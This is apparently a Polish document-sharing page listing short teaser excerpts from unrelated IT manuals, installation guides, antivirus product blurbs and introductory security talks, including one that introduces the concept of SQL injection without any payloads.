2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego 2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5

Bardziej szczegółowo

Dokumentacja smsapi wersja 1.4

Dokumentacja smsapi wersja 1.4 Dokumentacja smsapi wersja 1.4 1. Wprowadzenie Platforma smsapi została skierowana do użytkowników chcących rozbudować swoje aplikacje o system wysyłania smsów. Aplikacja ta w prosty sposób umożliwia integrację

Bardziej szczegółowo

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy

Bardziej szczegółowo

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08 Nr: 12 Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW Data modyfikacji: 2012-03-08 Co zawiera ten dokument: Ten dokument zawiera informacje o możliwościach i sposobie

Bardziej szczegółowo

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller Dokumentacja systemu NTP rekrut Autor: Sławomir Miller 1 Spis treści: 1. Wstęp 1.1 Wprowadzenie 1.2 Zakres dokumentu 2. Instalacja 2.1 Wymagania systemowe 2.2 Początek 2.3 Prawa dostępu 2.4 Etapy instalacji

Bardziej szczegółowo

Jak używać funkcji prostego udostępniania plików do udostępniania plików w systemie Windows XP

Jak używać funkcji prostego udostępniania plików do udostępniania plików w systemie Windows XP Jak używać funkcji prostego udostępniania plików do udostępniania plików w systemie Windows XP System Windows XP umożliwia udostępnianie plików i dokumentów innym użytkownikom komputera oraz innym użytkownikom

Bardziej szczegółowo

Strona wizytówka od 400 zł

Strona wizytówka od 400 zł Strona wizytówka od 400 zł Oferta z dnia 21.01.2010 Prosta strona zawierająca podstawowe informacje o firmie oraz jej ofercie. Pozwala ona klientom na odnalezienie firmy w sieci, zapoznanie się z jej ofertą,

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.

Bardziej szczegółowo

Produkty. MKS Produkty

Produkty. MKS Produkty Produkty MKS Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE MKS Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Podręcznik użytkownika

Podręcznik użytkownika Podręcznik użytkownika Promocja wykorzystania biogazu w regionach Europy www.biogasaccepted.eu Studienzentrum für internationale Analysen 4553 Schlierbach/ Österreich Manual - Page 1/13 Contents Contents...2

Bardziej szczegółowo

MS Windows Vista. Spis treści. Autor: Jacek Parzonka, InsERT

MS Windows Vista. Spis treści. Autor: Jacek Parzonka, InsERT MS Windows Vista Autor: Jacek Parzonka, InsERT Spis treści SPIS TREŚCI... 1 WSTĘP... 2 PROBLEMY... 2 UŻYWANIE AUTENTYKACJI WINDOWS DLA MS SQL SERVERA 2005 EXPRESS... 2 Run as administrator... 3 Modyfikacja

Bardziej szczegółowo

sprawdzonych porad z bezpieczeństwa

sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa O niebezpieczeństwach czyhających na użytkowników

Bardziej szczegółowo

Kancelaria Prawna.WEB - POMOC

Kancelaria Prawna.WEB - POMOC Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV

Bardziej szczegółowo

Oprogramowanie antywirusowe avast! Free Antivirus 7.x + virus do testów

Oprogramowanie antywirusowe avast! Free Antivirus 7.x + virus do testów Oprogramowanie antywirusowe avast! Free Antivirus 7.x + virus do testów Jak zainstalować avast! Free Antivirus 7.x? Następujące wymagania systemowe są zalecane dla instalacji i uruchomienia na komputerze

Bardziej szczegółowo

ArcaVir 2008 System Protection

ArcaVir 2008 System Protection ArcaVir 2008 System Protection ARCAVIR 2008 SYSTEM PROTECTION to oprogramowanie typu Internet Security stanowiące pełne zabezpieczenie przed zagrożeniami z Internetu i sieci LAN. OCHRONA ANTYWIRUSOWA Silnik

Bardziej szczegółowo

SSI Katalog. Program do katalogowania zawartości dysków. Dariusz Kalinowski

SSI Katalog. Program do katalogowania zawartości dysków. Dariusz Kalinowski 1.) Wymagania sprzętowe: SSI Katalog Program do katalogowania zawartości dysków Dariusz Kalinowski - System operacyjny: Windows 2000 lub Windows xp - Procesor minimum Pentium 1Ghz - Pamięć RAM minimum

Bardziej szczegółowo

I. Informacje ogólne. Jednym z takich systemów jest Mambo.

I. Informacje ogólne. Jednym z takich systemów jest Mambo. MAMBO (CMS) I. Informacje ogólne CMS, Content Management System ("system zarządzania treścią") jest to jedna lub zestaw aplikacji internetowych pozwalających na łatwe utworzenie oraz późniejszą aktualizację

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

Pracownia internetowa w każdej szkole (edycja Jesień 2007) Instrukcja numer D1/05_03/Z Pracownia internetowa w każdej szkole (edycja Jesień 2007) Opiekun pracowni internetowej cz. 1 Ręczne zakładanie kont użytkowników (D1) Jak ręcznie założyć konto w systemie

Bardziej szczegółowo

Projektowani Systemów Inf.

Projektowani Systemów Inf. Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych

Bardziej szczegółowo

STATISTICA 8 WERSJA JEDNOSTANOWISKOWA INSTRUKCJA INSTALACJI

STATISTICA 8 WERSJA JEDNOSTANOWISKOWA INSTRUKCJA INSTALACJI STATISTICA 8 WERSJA JEDNOSTANOWISKOWA INSTRUKCJA INSTALACJI Uwagi: 1. Użytkownicy korzystający z systemów operacyjnych Windows 2000, XP lub Vista na swoich komputerach muszą zalogować się z uprawnieniami

Bardziej szczegółowo

Zadanie 1 Treść zadania:

Zadanie 1 Treść zadania: Zadanie 1 Treść zadania: 1 2 Komentarz do zadania: Ocenie podlegały następujące elementy projektu: 1. Tytuł pracy egzaminacyjnej. 2. Założenia do projektu. 3. Lista prawdopodobnych przyczyn usterki systemu

Bardziej szczegółowo

9.1.2. Ustawienia personalne

9.1.2. Ustawienia personalne 9.1.2. Ustawienia personalne 9.1. Konfigurowanie systemu Windows Systemy z rodziny Windows umożliwiają tzw. personalizację ustawień interfejsu graficznego poprzez dostosowanie wyglądu pulpitu, menu Start

Bardziej szczegółowo

BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21

BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21 BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21 BGK@24Biznes Dziękujemy Państwu za wybranie usługi bankowości elektronicznej Banku Gospodarstwa Krajowego BGK@24Biznes. Nasz system bankowości

Bardziej szczegółowo

PORADNIK Zasady i zalecenia pracy z plikami oraz tekstem na stronach nowego portalu SGH (na platformie SharePoint)

PORADNIK Zasady i zalecenia pracy z plikami oraz tekstem na stronach nowego portalu SGH (na platformie SharePoint) PORADNIK Zasady i zalecenia pracy z plikami oraz tekstem na stronach nowego portalu SGH (na platformie SharePoint) wersja 2.0. (6 listopada 2015 r.) Przygotowanie: Dział Informacji i Komunikacji, Dział

Bardziej szczegółowo

Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/1.1.1/2015

Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/1.1.1/2015 Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/1.1.1/2015 INFORMACJE OGÓLNE 1. Wnioski o dofinansowanie projektu w ramach konkursu nr 1/1.1.1/2015

Bardziej szczegółowo

Pracownia internetowa w szkole ZASTOSOWANIA

Pracownia internetowa w szkole ZASTOSOWANIA NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje

Bardziej szczegółowo

Szkolenie z użytkowania platformy ONLINE.WSNS

Szkolenie z użytkowania platformy ONLINE.WSNS WYŻSZA SZKOŁA NAUK SPOŁECZNYCH z siedzibą w Lublinie PLATFORMA E-LEARNING Szkolenie z użytkowania platformy ONLINE.WSNS Lublin, 2011 admin@wsns.pl 2011 Wyższa Szkoła Nauk Społecznych http://www.wsns.pl

Bardziej szczegółowo

Instalacja systemu zarządzania treścią (CMS): Joomla

Instalacja systemu zarządzania treścią (CMS): Joomla Instalacja systemu zarządzania treścią (CMS): Joomla Na stronie http://www.cba.pl/ zarejestruj nowe konto klikając na przycisk:, następnie wybierz nazwę domeny (Rys. 1a) oraz wypełnij obowiązkowe pola

Bardziej szczegółowo

Cechy systemu X Window: otwartość niezależność od producentów i od sprzętu, dostępny kod źródłowy; architektura klient-serwer;

Cechy systemu X Window: otwartość niezależność od producentów i od sprzętu, dostępny kod źródłowy; architektura klient-serwer; 14.3. Podstawy obsługi X Window 14.3. Podstawy obsługi X Window W przeciwieństwie do systemów Windows system Linux nie jest systemem graficznym. W systemach Windows z rodziny NT powłokę systemową stanowi

Bardziej szczegółowo

instrukcja INSTALACJI www.piersa.pl APi_proxy

instrukcja INSTALACJI www.piersa.pl APi_proxy instrukcja INSTALACJI 1 1. Instalacja Proces instalacji jest prosty wgrywamy pliki na serwer nadajemy prawa chmod 777 lub 755 dla katalogu w którym znajduje się aplikacja przeważnie będzie to katalog public_html

Bardziej szczegółowo

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego ZADANIE V OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego A. ROZMIARY I CHARAKTER ZADANIA 1. W ramach dostawy oprogramowania antywirusowego Szpital

Bardziej szczegółowo

PROBLEMY TECHNICZNE. Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS

PROBLEMY TECHNICZNE. Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS PROBLEMY TECHNICZNE Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS Jeżeli stwierdziłeś występowanie błędów lub problemów podczas pracy z programem DYSONANS możesz skorzystać

Bardziej szczegółowo

dziennik Instrukcja obsługi

dziennik Instrukcja obsługi Ham Radio Deluxe dziennik Instrukcja obsługi Wg. Simon Brown, HB9DRV Tłumaczenie SP4JEU grudzień 22, 2008 Zawartość 3 Wprowadzenie 5 Po co... 5 Główne cechy... 5 baza danych 7 ODBC... 7 Który produkt

Bardziej szczegółowo

windows XP n a j l e p s z e t r i k i

windows XP n a j l e p s z e t r i k i windows XP n a j l e p s z e t r i k i windows XP n a j l e p s z e t r i k i Jak zoptymalizować pracę z systemem Windows XP?... 3 Jak szybko uruchamiać programy?... 3 W jaki sposób dostosować pulpit i

Bardziej szczegółowo

Przewodnik Szybki start

Przewodnik Szybki start Przewodnik Szybki start Program Microsoft Access 2013 wygląda inaczej niż wcześniejsze wersje, dlatego przygotowaliśmy ten przewodnik, aby skrócić czas nauki jego obsługi. Zmienianie rozmiaru ekranu lub

Bardziej szczegółowo

Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny

Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny AiRIII gr. 2TI sekcja 1 Autorzy: Tomasz Bizon Józef Wawrzyczek 2 1. Wstęp Celem projektu było stworzenie sklepu

Bardziej szczegółowo

Rejestratory Trend szybka konfiguracja do obsługi przez sieć.

Rejestratory Trend szybka konfiguracja do obsługi przez sieć. Rejestratory Trend szybka konfiguracja do obsługi przez sieć. Rejestratory TREND serii 250 zarządzane mogą być nie tylko lokalnie, ale także zdalnie, przez sieć Internet. Aby połączenie działało prawidłowo

Bardziej szczegółowo

Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL.

Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Prezentacja Danych i Multimedia II r Socjologia Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Celem ćwiczeń jest poznanie zasad tworzenia baz danych i zastosowania komend SQL. Ćwiczenie I. Logowanie

Bardziej szczegółowo

Spis treści. Spis treści... 2. Wstęp... 3. Instalacja nazwa.pl... 3. Instalacja Home.pl... 8. Edycja grafiki strony... 17. logo...

Spis treści. Spis treści... 2. Wstęp... 3. Instalacja nazwa.pl... 3. Instalacja Home.pl... 8. Edycja grafiki strony... 17. logo... Instalacja serwera Spis treści Spis treści... 2 Wstęp... 3 Instalacja nazwa.pl... 3 Instalacja Home.pl... 8 Edycja grafiki strony... 17 logo... 17 Wstęp Najnowszy sklep internetowy spod znaku sellsmart,

Bardziej szczegółowo

Currenda EPO Instrukcja Konfiguracji. Wersja dokumentu: 1.3

Currenda EPO Instrukcja Konfiguracji. Wersja dokumentu: 1.3 Currenda EPO Instrukcja Konfiguracji Wersja dokumentu: 1.3 Currenda EPO Instrukcja Konfiguracji - wersja dokumentu 1.3-19.08.2014 Spis treści 1 Wstęp... 4 1.1 Cel dokumentu... 4 1.2 Powiązane dokumenty...

Bardziej szczegółowo

Pomoc systemu poczty elektronicznej Wydziału Humanistycznego Uniwersytetu Szczecińskiego. Wersja: 1.12

Pomoc systemu poczty elektronicznej Wydziału Humanistycznego Uniwersytetu Szczecińskiego. Wersja: 1.12 Pomoc systemu poczty elektronicznej Wydziału Humanistycznego Uniwersytetu Szczecińskiego Wersja: 1.12 Instrukcja samodzielnej rejestracji konta poczty elektronicznej w domenie whus.pl Przejdź Instrukcja

Bardziej szczegółowo

Pomoc dla http://host.nask.pl/ 31.12.2012 r.

Pomoc dla http://host.nask.pl/ 31.12.2012 r. Pomoc dla http://host.nask.pl/ 31.12.2012 r. Spis treści Kontakt... 2 Logowanie do konta pocztowego przez WWW... 3 Logowanie do panelu administracyjnego... 4 Konfiguracja klienta pocztowego... 7 Umieszczanie

Bardziej szczegółowo

6. Bezpieczeństwo przy współpracy z bazami danych

6. Bezpieczeństwo przy współpracy z bazami danych 6. Bezpieczeństwo przy współpracy z bazami danych 6.1. Idea ataku SQL injection Atak znany jako SQL injection jest możliwy wtedy, gdy użytkownik ma bezpośredni wpływ na postać zapytania wysyłanego do bazy

Bardziej szczegółowo

System kontroli dostępu ACCO NET Instrukcja instalacji

System kontroli dostępu ACCO NET Instrukcja instalacji System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166

Bardziej szczegółowo

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione.

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione. Rozdział 6 - Z kim się kontaktować - 199 - Spis treści - 200 - Rozdział 6 - Z kim się kontaktować Spis treści Rozdział 1: Podstawy bezpiecznego użytkowania komputera... - 3 - Dlaczego należy aktualizować

Bardziej szczegółowo

Technologia Automatyczne zapobieganie exploitom

Technologia Automatyczne zapobieganie exploitom Technologia Automatyczne zapobieganie exploitom Podejście Kaspersky Lab do bezpieczeństwa opiera się na ochronie wielowarstwowej. Większość szkodliwych programów powstrzymuje pierwsza warstwa zostają np.

Bardziej szczegółowo

REDIVE PRZEWODNIK PO PLATFORMIE LMS

REDIVE PRZEWODNIK PO PLATFORMIE LMS REDIVE PRZEWODNIK PO PLATFORMIE LMS PROJ. Nº 528362-LLP-1-2012-1-PT-ERASMUS-ECUE Ten projekt został zrealizowany przy wsparciu finansowym Komisji Europejskiej. Projekt lub publikacja odzwierciedlają jedynie

Bardziej szczegółowo

SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE..

SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE.. SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE.. Cel prezentacji Spojrzymy na dane i serwery SQL z perspektywy cyberprzestępcy, omówimy

Bardziej szczegółowo

Skanowanie podsieci oraz wykrywanie terminali ABA-X3

Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Terminale ABA-X3 od dostarczane od połowy listopada 2010 r. są wyposażane w oprogramowanie umożliwiające skanowanie podsieci w poszukiwaniu aktywnych

Bardziej szczegółowo

Produkty. ESET Produkty

Produkty. ESET Produkty Produkty ESET Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE ESET Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

Tematyka i rozwiązania metodyczne kolejnych zajęć lekcyjnych wraz z ćwiczeniami.

Tematyka i rozwiązania metodyczne kolejnych zajęć lekcyjnych wraz z ćwiczeniami. Tematyka i rozwiązania metodyczne kolejnych zajęć lekcyjnych wraz z ćwiczeniami. Zagadnienie tematyczne (blok tematyczny): Internet i sieci (Podr.cz. II, str.37-69) Podstawa programowa: Podstawowe zasady

Bardziej szczegółowo

ArtPlayer oprogramowanie do odtwarzania plików video sterowane Artnet/DMX V1.0.1

ArtPlayer oprogramowanie do odtwarzania plików video sterowane Artnet/DMX V1.0.1 Instrukcja obsługi ArtPlayer oprogramowanie do odtwarzania plików video sterowane Artnet/DMX V1.0.1 1 ArtPlayer to proste oprogramowanie umożliwiające odtwarzanie plików video i ich wybór poprzez protokół

Bardziej szczegółowo

Gerard Frankowski, Zespół Bezpieczeństwa PCSS. Nowoczesne technologie bliżej nas Poznań, 04.03.2010

Gerard Frankowski, Zespół Bezpieczeństwa PCSS. Nowoczesne technologie bliżej nas Poznań, 04.03.2010 Bezpieczeństwo interoperacyjnego hostingu Gerard Frankowski, Zespół Bezpieczeństwa PCSS 4. Konferencja MIC Nowoczesne technologie bliżej nas Poznań, 04.03.2010 1 Agenda Wprowadzenie Zespół Bezpieczeństwa

Bardziej szczegółowo

Temat: Windows 7 Centrum akcji program antywirusowy

Temat: Windows 7 Centrum akcji program antywirusowy Instrukcja krok po kroku Centrum akcji program antywirusowy. Strona 1 z 9 Temat: Windows 7 Centrum akcji program antywirusowy Logowanie do konta lokalnego Administrator Start Panel sterowania Widok według:

Bardziej szczegółowo

System MWTB to program, który stwarza warunki do prezentacji Waszej firmy.

System MWTB to program, który stwarza warunki do prezentacji Waszej firmy. Witamy Państwa na Międzynarodowych Wirtualnych Targach Budownictwa zorganizowanych przez grupę specjalistów związanych z branżą budowlano informatyczną. Doceniając rangę internetu we współczesnym świecie,

Bardziej szczegółowo

Integracja sklepu internetowego z serwisem aukcyjnym Swistak.pl

Integracja sklepu internetowego z serwisem aukcyjnym Swistak.pl Integracja sklepu internetowego z serwisem aukcyjnym Swistak.pl email: swistak@swistak.pl Spis treści 1. Wstęp...2 2. Import oferty...2 3. Plik CSV...3 4. Przykład pliku...7 5. Aktualizacja oferty...7

Bardziej szczegółowo

Panel Administracyjny Spis treści:

Panel Administracyjny Spis treści: Panel Administracyjny Spis treści: 1. Wstęp - ogólne informacje dot. panelu Moje-Serwery.pl 2. Rejestracja konta w serwisie Moje-Serwery.pl i logowanie. 3. Dane konta - ustawienia konta użytkownika. 4.

Bardziej szczegółowo

INSTRUKCJA INSTALACJI

INSTRUKCJA INSTALACJI INSTRUKCJA INSTALACJI TcpMDT ver. 7 Aplitop, 2014 C/ Sumatra, 9 E-29190 MÁLAGA (SPAIN) web: www.aplitop.com e-mail: support@aplitop.com Spis treści Instalacja MDT ver. 7... 3 Wymagania systemowe... 3 Menu

Bardziej szczegółowo

Kadry Optivum, Płace Optivum. Jak przenieść dane na nowy komputer?

Kadry Optivum, Płace Optivum. Jak przenieść dane na nowy komputer? Kadry Optivum, Płace Optivum Jak przenieść dane na nowy komputer? Aby kontynuować pracę z programem Kadry Optivum lub Płace Optivum (lub z obydwoma programami pracującymi na wspólnej bazie danych) na nowym

Bardziej szczegółowo

POLITYKA COOKIES. Definicje. Rodzaje wykorzystywanych Cookies

POLITYKA COOKIES. Definicje. Rodzaje wykorzystywanych Cookies POLITYKA COOKIES Niniejsza Polityka Cookies określa zasady przechowywania i dostępu do informacji na urządzeniach Użytkownika za pomocą plików Cookies, służących realizacji usług świadczonych drogą elektroniczną

Bardziej szczegółowo

Instrukcjaaktualizacji

Instrukcjaaktualizacji Instrukcja Instrukcjaaktualizacji aktualizacji oprogramowania oprogramowaniainpro InProBMS BMS SPIS TREŚCI 1. AKTUALIZACJA 3 1.1. ARCHIWIZACJA BAZY DANYCH...3 1.1.1. AUTOMATYCZNA...3 1.1.2. RĘCZNA...4

Bardziej szczegółowo

www.gim4.slupsk.pl/przedmioty

www.gim4.slupsk.pl/przedmioty Lekcja 4. Program komputerowy - instalacja i uruchomienie 1. Rodzaje programów komputerowych 2. Systemy operacyjne 3. Instalowanie programu 4. Uruchamianie programu 5. Kilka zasad pracy z programem komputerowym

Bardziej szczegółowo

World Wide Web? rkijanka

World Wide Web? rkijanka World Wide Web? rkijanka World Wide Web? globalny, interaktywny, dynamiczny, wieloplatformowy, rozproszony, graficzny, hipertekstowy - system informacyjny, działający na bazie Internetu. 1.Sieć WWW jest

Bardziej szczegółowo

Internetowy serwis Era mail Aplikacja sieci Web

Internetowy serwis Era mail Aplikacja sieci Web Internetowy serwis Era mail Aplikacja sieci Web (www.login.eramail.pl) INSTRUKCJA OBSŁUGI Spis treści Internetowy serwis Era mail dostępny przez komputer z podłączeniem do Internetu (aplikacja sieci Web)

Bardziej szczegółowo

Firma Informatyczna ASDER. Prezentacja. Serwer danych lokalnych. Przemysław Kroczak ASDER 2012-08-06

Firma Informatyczna ASDER. Prezentacja. Serwer danych lokalnych. Przemysław Kroczak ASDER 2012-08-06 2012 Firma Informatyczna ASDER Prezentacja Serwer danych lokalnych Przemysław Kroczak ASDER 2012-08-06 Szanowni Państwo, W dzisiejszej coraz częściej trzeba współdzielić pliki między pracownikami/działami

Bardziej szczegółowo

FAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen?

FAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? 27.06.11 FAQ Systemu EKOS 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? Procedura rejestracji ocen wymaga podpisywania protokołów (w postaci wypełnionych formularzy InfoPath Forms

Bardziej szczegółowo

1. Platforma e-learningowa

1. Platforma e-learningowa Instrukcja korzystania z platformy e-learningowej Zespołu Szkół Technicznych im. gen. prof. S. Kaliskiego w Turku dla prowadzących zajęcia - Kwalifikacyjne Kursy Zawodowe 1. Platforma e-learningowa Zespół

Bardziej szczegółowo

Program PortaScan wersja 1.0.3. Instrukcja obsługi

Program PortaScan wersja 1.0.3. Instrukcja obsługi Porta KMI Poland Sp. z o.o. Bolszewo, ul. Szkolna 26 Program PortaScan wersja 1.0.3 Instrukcja obsługi Wykonano: Dział IT Porta KMI Poland Sp. z o.o. Program PortaScan wersja 1.0.3. Instrukcja instalacji

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami

Bardziej szczegółowo

Projektowanie baz danych za pomocą narzędzi CASE

Projektowanie baz danych za pomocą narzędzi CASE Projektowanie baz danych za pomocą narzędzi CASE Metody tworzenia systemów informatycznych w tym, także rozbudowanych baz danych są komputerowo wspomagane przez narzędzia CASE (ang. Computer Aided Software

Bardziej szczegółowo

Instrukcja. Rejestracji i aktywacji konta w systemie so-open.pl DOTACJE NA INNOWACJE; SOFTWARE OPERATIONS SP. Z O. O.

Instrukcja. Rejestracji i aktywacji konta w systemie so-open.pl DOTACJE NA INNOWACJE; SOFTWARE OPERATIONS SP. Z O. O. Instrukcja Rejestracji i aktywacji konta w systemie so-open.pl 1Strona 1 z 12 Spis treści Wstęp... 3 Rejestracja... 3 Aktywacja konta... 5 Rozpoczęcie pracy z systemem... 7 Pierwsze logowanie do systemu...

Bardziej szczegółowo

Stawiamy pierwsze kroki

Stawiamy pierwsze kroki Stawiamy pierwsze kroki 3.1. Stawiamy pierwsze kroki Edytory tekstu to najbardziej popularna odmiana programów służących do wprowadzania i zmieniania (czyli edytowania) tekstów. Zalicza się je do programów

Bardziej szczegółowo

Płace Optivum. 1. Zainstalować serwer SQL (Microsoft SQL Server 2008 R2) oraz program Płace Optivum.

Płace Optivum. 1. Zainstalować serwer SQL (Microsoft SQL Server 2008 R2) oraz program Płace Optivum. Płace Optivum Jak przenieść dane programu Płace Optivum na nowy komputer? Aby kontynuować pracę z programem Płace Optivum na nowym komputerze, należy na starym komputerze wykonać kopię zapasową bazy danych

Bardziej szczegółowo

Memeo Instant Backup Podręcznik Szybkiego Startu

Memeo Instant Backup Podręcznik Szybkiego Startu Wprowadzenie Memeo Instant Backup pozwala w łatwy sposób chronić dane przed zagrożeniami cyfrowego świata. Aplikacja regularnie i automatycznie tworzy kopie zapasowe ważnych plików znajdujących się na

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Skrócony podręcznik dla partnerów

Skrócony podręcznik dla partnerów Skrócony podręcznik dla partnerów Zapraszamy Dziękujemy za wybranie usługi GFI MAX MailProtection (dawniej Katharion ). Firma GFI będąca liderem walki ze spamem dokłada wszelkich starań, aby zapewnić użytkownikom

Bardziej szczegółowo

System Comarch OPT!MA v. 17.1

System Comarch OPT!MA v. 17.1 System Comarch OPT!MA v. 17.1 Comarch OPT!MA Pulpit Menadżera v. 4.1 31-864 Kraków, Al. Jana Pawła II 41g tel. (12) 681 43 00, fax (12) 687 71 00 Dział Wsparcia Klienta i Partnera: (12) 681 43 00 http://www.comarch.pl/erp/

Bardziej szczegółowo

Facebook, Nasza klasa i inne. www.facebook.com. podstawowe informacje o serwisach społeczności internetowych. Cz. 2. Facebook

Facebook, Nasza klasa i inne. www.facebook.com. podstawowe informacje o serwisach społeczności internetowych. Cz. 2. Facebook Facebook, Nasza klasa i inne podstawowe informacje o serwisach społeczności internetowych Cz. 2. Facebook www.facebook.com Facebook to drugi najczęściej wykorzystywany portal społecznościowy w Polsce i

Bardziej szczegółowo

Instalacja Webroot SecureAnywhere przy użyciu GPO w Active Directory

